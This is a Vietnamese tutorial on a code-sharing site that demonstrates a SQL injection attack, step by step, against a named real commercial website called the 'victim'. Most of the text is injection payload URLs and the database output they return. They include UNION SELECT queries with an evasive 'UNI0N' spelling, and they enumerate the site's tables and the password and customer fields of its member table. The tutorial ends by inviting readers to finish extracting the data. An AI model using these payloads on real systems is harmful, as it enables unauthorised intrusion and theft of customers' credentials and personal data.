Hướng dẫn khai thác sql dạng html

Xem: 1521    Tải: 0   Thảo luận: 0   Mục: MySQL   Lĩnh vực: Khác

0 điểm   ( 8 đánh giá ) File đã được kiểm thử


Khai thác sql dạng HTML

victim lần này là:
http://www.worldwide...ticles-261.html

Thêm dấu ' vào sau những con số
http://www.worldwide...s-261'.html

haha lỗi rồi


Warning: mysql_fetch_object(): supplied argument is not a valid MySQL result resource in /home/whc/www/articles.php on line 16

Warning: Cannot modify header information - headers already sent by (output started at /home/whc/www/articles.php:16) in /home/whc/www/include.php on line 432

Bắt đầu order by
http://www.worldwide...et/articles-261 order by 1-- -.html >>ok
http://www.worldwide...et/articles-261 order by 7-- -.html >> ok
http://www.worldwide...et/articles-261 order by 8-- -.html >> bao loi

>>8-1=7 nhé

bây h UNI0N select :
http://www.worldwide...et/articles-261 UNI0N select 1,2,3,4,5,6,7-- -.html

ui số má đâu hết rồi: , view source , chẳng thấy gì hết chán.

Ghét quá thay số bằng null xem 261=null

http://www.worldwide...t/articles-null UNI0N select 1,2,3,4,5,6,7-- -.html

ui ra rồi 2 và 3 nhé

Tìm các thông tin :version(),database(),user()

http://www.worldwide...t/articles-null UNI0N select 1,2,version(),4,5,6,7-- -.html

Tiếp theo tìm table name
http://www.worldwide...t/articles-null UNI0N select 1,2,group_concat(table_name),4,5,6,7 from information_schema.tables where table_schema=database()-- -.html

1 đống :
adprice,artcat,articles,banners,brands,bulktemp,ca tegories,clickthrus,concerns,countries,directory,d irectorybak,directorystats,discount,distributorord er,emailaddresses,exchange,iptoc,keywords,loyalty, member,memberbak,memberbak2,message,ocountries,ord eritems,orders,ordersbak,postal,practcat,products, productsbak,purchaseorders,retaildiscount,ship,shi pdiscount,shipping,states,static,subscribers,suppl iers

Tìm table chứa thông tin

Ở đây nhìu cái quá mình loạn, thôi mình tìm table member nhé
member=0x6d656d626572 (conver to hex nhé)
get column

http://www.worldwide...t/articles-null UNI0N select 1,2,group_concat(column_name),4,5,6,7 from information_schema.columns where table_schema=database() and table_name=0x6d656d626572-- -.html

lại ra 1 đống :
id,password,email,title,firstname,surname,company, address,city,state,postal,shoppercountry,tel,fax,s ameshipadd,shiptitle,shipfirstname,shipsurname,shi pcompany,shipaddress,shipcity,shipstate,country,sh ippostal,shiptel,shipfax,advertise,dateemailed,typ e

Tới đây là được rồi, mọi cái còn lại đơn giản , ae làm nhé

Hướng dẫn khai thác sql dạng html

Hướng dẫn khai thác sql dạng html Đăng ngày 08-07-2013  Hướng dẫn khai thác sql dạng htm 5/10 1521

Thảo luận:

Để bình luận bạn phải đăng nhập thành viên.

File tương tự

  • Lập Trình website động với php my sql

    Lập Trình  website động với  php my sql
    Chuyên mục: MySQL
    Lượt xem: 3015    Lượt tải file: 79   Lĩnh vực: Khác
    1 mega   Chúng ta hay thực hiện một chuyến đi thần thoại trong chuyến đi này chúng ta sẽ khám phá ngoại hình cũng như nội tạn của...
  • Tài liệu bảo mật Trong SQL SERVER 2008

    Tài liệu bảo mật Trong SQL SERVER 2008
    Chuyên mục: MySQL
    Lượt xem: 2482    Lượt tải file: 36   Lĩnh vực: Khác
    1 mega   Quản trị viên CSDL là người chịu trách nhiệm về hiệu năng, tính toàn vẹn dữ liệu và bảo mật cho CSDL.
  • Quản lý cơ sở dữ liệu với Microsoft SQL Server 2005

    Quản lý cơ sở dữ liệu với Microsoft SQL Server 2005
    Chuyên mục: MySQL
    Lượt xem: 2023    Lượt tải file: 8   Lĩnh vực: Khác
    2 mega   Tài liệu sau đây sẽ hướng dẫn bạn cách quản lý cơ sở dữ liệu với Microsoft SQL Server 2005. Hy vọng tài liệu sẽ hữu ích...
  • Bài giảng khai phá dữ liệu

    Bài giảng khai phá dữ liệu
    Chuyên mục: MySQL
    Lượt xem: 2290    Lượt tải file: 6   Lĩnh vực: Khác
    2 mega   Tài liệu này cung cấp các kiến thức cơ bản về kho dữ liệu lớn và các kỹ thuật khai phá dữ liệu.

Files cùng mục

 

File tải nhiều nhất

Megacode.vn - Thư viện mã nguồn chia sẻ, tải file cho cộng đồng
Copyright © 2013-2016. All rights reserved. Bản quyền thuộc VinaGon
Địa chỉ: Số 38 Hàng Bè, Hàng Bạc, Hoàn Kiếm, Hà Nội.
Văn phòng giao dịch: Phòng 28, Tầng 6, HH1A Linh Đàm, Hoàng Mai, Hà Nội
Email: info@vinagon.com | Website: www.vinagon.com | Điện thoại: (+844) 6. 32.979.36;
logo megacode

Megacode đã đăng ký với Bộ Công Thương
Thư viện mã nguồn mở lớn nhất Việt Nam.



Hỗ trợ khách hàng trên Megacode
Hỗ trợ kỹ thuật cho thành viên:
Tổng đài: (+844) 6. 32.979.36
Số di động (Hotline): 0969.091.265
Thời gian làm việc:
Sáng: 8h-12h; Chiều: 13h30-17h30
(Nghỉ chiều T7, CN và các ngày lễ, tết)
Chat với Megacode
https://www.facebook.com/megacodevn